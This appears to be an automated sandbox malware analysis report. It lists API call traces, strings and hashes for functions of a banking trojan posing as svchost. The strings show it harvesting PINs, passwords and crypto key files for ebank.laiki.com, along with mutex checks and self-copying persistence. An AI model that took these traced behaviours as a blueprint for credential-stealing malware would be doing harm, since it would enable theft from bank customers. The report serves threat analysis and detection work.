                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCEBDC
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCEBE3
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCEC1B
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BCEC28
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d72c4,?,?), ref: 02BCEC67
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02BCECA5
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCECAC
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCECB4
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02BCECC5
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCECCC
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 02BCED06
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02BCED31
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000000,?), ref: 02BCED55
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000006), ref: 02BCED72
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BCED79
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCED8B
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCED9C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCEDAB
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BCEDAE
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCEDBB
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BCEDBE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorHeapLastPath$CreateDirectoryFile$AdminAttributesBackslashFolderHandleMakeMutexProcessSystemUser$CloseCurrentDeleteFreeInformationReleaseSleepValidatememset
                                                                                                                                                                                                                • String ID: 617d72c4$Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$P0Wu$keys.zip$path.txt
                                                                                                                                                                                                                • API String ID: 1472338570-3760082667
                                                                                                                                                                                                                • Opcode ID: fb9043353c9a3f642428f2ffbbaff115dee80e5f5c30fe3208f2afc6fc8558b1
                                                                                                                                                                                                                • Instruction ID: 9f136754a1750cd4c54a7908d430c77418d29cd0ca2011ccfc825222ceeef525
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb9043353c9a3f642428f2ffbbaff115dee80e5f5c30fe3208f2afc6fc8558b1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D7124309407559FDB718B38D858BEB7BE8EF45740F6489C8EA86D7240DB70DA44CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75435430,00000000,?), ref: 00401923
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                • API String ID: 3422789474-2746444292
                                                                                                                                                                                                                • Opcode ID: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                                • Instruction ID: 871197f746f8751ebb4c77b71a3ee3543858eb92964eac2fec8a8f15daba1beb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D861D8B1A013157BDB209FA69C48FAB7B6CEF84750F15412AFA18B72D0DA749900CFB4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,7702DB30), ref: 00402AAB
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 00402AE4
                                                                                                                                                                                                                • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                                  • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                  • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                  • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                  • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                  • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                  • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                                • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                                • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                                • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                                • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                                • API String ID: 4049655197-3112416296
                                                                                                                                                                                                                • Opcode ID: 29e1a8a2fb924a41aaaa96706548a4c43bedaf2d15c95e08a4fa1e443ebad758
                                                                                                                                                                                                                • Instruction ID: 5ff553944d99263ee06e3162097b0b7c6440a9b95b570a66abc1ee1896f9e821
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29e1a8a2fb924a41aaaa96706548a4c43bedaf2d15c95e08a4fa1e443ebad758
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28716FB15043419BC710EF609E9C96BBBE8BBD8300F44493EF786B72A1DB749944CB99
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: malloc$free$fclosefopenfreadsprintf$callocfseekrealloc
                                                                                                                                                                                                                • String ID: %s.DBF$%s.dbf$r+b$rb+
                                                                                                                                                                                                                • API String ID: 3942648141-1626032180
                                                                                                                                                                                                                • Opcode ID: 3a6e4deee6ebf492969637524cf6f71780ce01b2872132ab1a9491f51674e5de
                                                                                                                                                                                                                • Instruction ID: 969f26b98f297806455ff3e67c4735cdf336fd5648b271f21f101e84d55a0c1d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a6e4deee6ebf492969637524cf6f71780ce01b2872132ab1a9491f51674e5de
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DD124B1A042419FC7228F388C947B6BFE6EF46204B6D46EDE985CB342E736D509CB50
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004036CB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 00403717
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 0040371E
                                                                                                                                                                                                                • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                                • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                                • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                                • String ID: 00-->$<Actions $p=5w
                                                                                                                                                                                                                • API String ID: 3028510665-3742188657
                                                                                                                                                                                                                • Opcode ID: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                                • Instruction ID: bc67798b7604906b9ac94ea6a24e9e769d05a344691ee016a8b24aa6f3249a27
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62A1CEB25043119BC720DF64CC49F5B7BA8EFC8751F048A29FA49A7391D774EA04CB99
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$FileOperation$ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser
                                                                                                                                                                                                                • String ID: 617D73AC$\*.key$\@rand$\ABONENTS*$\CA*$\CRL*$\self.cer$keys
                                                                                                                                                                                                                • API String ID: 3912299499-1542089530
                                                                                                                                                                                                                • Opcode ID: 11d4bb0cfed7989e13b5d3a0416d27ebc804357fb050b2f6d41da727234148c9
                                                                                                                                                                                                                • Instruction ID: 26a030f6808de7b4fa85e084009c030c8c6ee34e8dcc56370cb090970b671dd4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11d4bb0cfed7989e13b5d3a0416d27ebc804357fb050b2f6d41da727234148c9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1E128B0D002599FCB51CFA8D950AEEBBF4EF49340F1085AAD989E7211E7309658CF94
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: P0Wu$open$taskmgr
                                                                                                                                                                                                                • API String ID: 0-1571188809
                                                                                                                                                                                                                • Opcode ID: 29acbfd419b45ae2108619323f4f4e3e6139191a5c07624175525951261f8e99
                                                                                                                                                                                                                • Instruction ID: 272cdda21bc424d3c8aca68ecd098868caaba4cba710364516bec1732888b816
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29acbfd419b45ae2108619323f4f4e3e6139191a5c07624175525951261f8e99
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4691F731E40205EBC720DF68EC88FFA7768EF49356F444A95FA1597291C7B19C21CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD20EE
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d77e0), ref: 02BD212F
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d77e0), ref: 02BD216B
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD2180
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD218A
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD2192
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD21A3
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD21AA
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BD21E2
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BD21EF
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d77e0,?,?), ref: 02BD2237
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$Backslash$ErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                                • String ID: 617d77e0$keys.zip$path.txt
                                                                                                                                                                                                                • API String ID: 1668326001-612975931
                                                                                                                                                                                                                • Opcode ID: 52e3de3a786761f549f2e1dbca32727e3c12d4f55b0b609dd5811d8570f40f47
                                                                                                                                                                                                                • Instruction ID: a9bba2da42309262e22d092e927aad61981a3ccbe6cfdc271fbfd76bacc4aa35
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52e3de3a786761f549f2e1dbca32727e3c12d4f55b0b609dd5811d8570f40f47
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD7124309407859FDB618B389C98BEA7BE8EF45740F5489D4FAC5D7242EB709984CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD01BE
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7202), ref: 02BD01EB
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD022D
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD0233
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD023B
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD024C
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD0253
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7202,?,?), ref: 02BD02C7
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02BD0305
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashCreateDirectoryErrorLast$AdminFolderMakeSystemUsermemset
                                                                                                                                                                                                                • String ID: 617D7202$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}$P0Wu$path.txt
                                                                                                                                                                                                                • API String ID: 2217318736-3041076808
                                                                                                                                                                                                                • Opcode ID: 94aea368a8637c40902ceac5def8f0776fe291b6f0e3e7cb8c97e9cf0cd7bd6b
                                                                                                                                                                                                                • Instruction ID: 5a0345a2d2781055f3560d8dd16b069c15648128d234aa319462c27b37eac927
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94aea368a8637c40902ceac5def8f0776fe291b6f0e3e7cb8c97e9cf0cd7bd6b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5711830A447155FDB619B389858BEB7FE8EF45380F4489D4EAC6D7241EB70DA44CB90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BD1A83
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BD1A92
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BD1AA1
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D4A8), ref: 02BD1ACD
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D4A8), ref: 02BD1B03
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02BD1B6C
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD1B76
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD1B7E
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD1B8F
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD1B96
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02BD1BA3
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000000,00000001), ref: 02BD1BCD
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BD1BF2
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,02BC8A50), ref: 02BD1C0F
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BD1C29
                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 02BD1C33
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 02BD1C3E
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD1C45
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD1C53
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD1C64
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Security$DescriptorPathstrstr$BackslashCreateDirectoryErrorHandleLastMutex$AdminCloseConvertCurrentFolderFreeInfoInformationLocalMakeNamedReleaseSaclSleepStringSystemUser
                                                                                                                                                                                                                • String ID: &txtPin=$&txtSubId=$Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}$P0Wu$S:(ML;;NRNWNX;;;LW)$ebank.laiki.com$pass.txt
                                                                                                                                                                                                                • API String ID: 532458909-3260415688
                                                                                                                                                                                                                • Opcode ID: 1853acc88259552f48364d31afcc9591d2d2c1d59b846c08b75b592cccd5022e
                                                                                                                                                                                                                • Instruction ID: 4b66ed6bf3828670c468bd11d27ae282904578014eca3dcf8c952f234d9b90d6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1853acc88259552f48364d31afcc9591d2d2c1d59b846c08b75b592cccd5022e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E251E831A402096BDB259F7C9C98BEF7BA9EF45785F048594FA4AD7100FB70E94487A0
